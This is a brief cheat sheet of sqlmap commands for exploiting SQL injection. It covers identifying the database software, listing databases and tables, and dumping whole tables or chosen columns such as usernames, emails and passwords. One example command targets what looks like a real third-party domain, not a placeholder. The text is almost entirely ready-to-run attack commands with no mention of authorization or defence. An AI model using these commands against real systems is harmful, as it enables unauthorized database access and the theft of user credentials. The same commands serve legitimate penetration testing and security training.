SQL Injection with sqlmap
Grabbing the Database software
sqlmap -u example.com/product/19* --banner
we put star as the vulnerable parameter
sqlmap -r req.txt --current-db
Listing Tables
sqlmap -u catalog.sphassets.com/product/19* --tables
or
sqlmap -r request.txt -D social --tables
Dump entries from a specific table example
sqlmap -u example.com/product/19* -T users_field_data –dump
Dumping specific columns from a table example
sqlmap -r request.txt -D social -T users -C username,email,password --dump
Last updated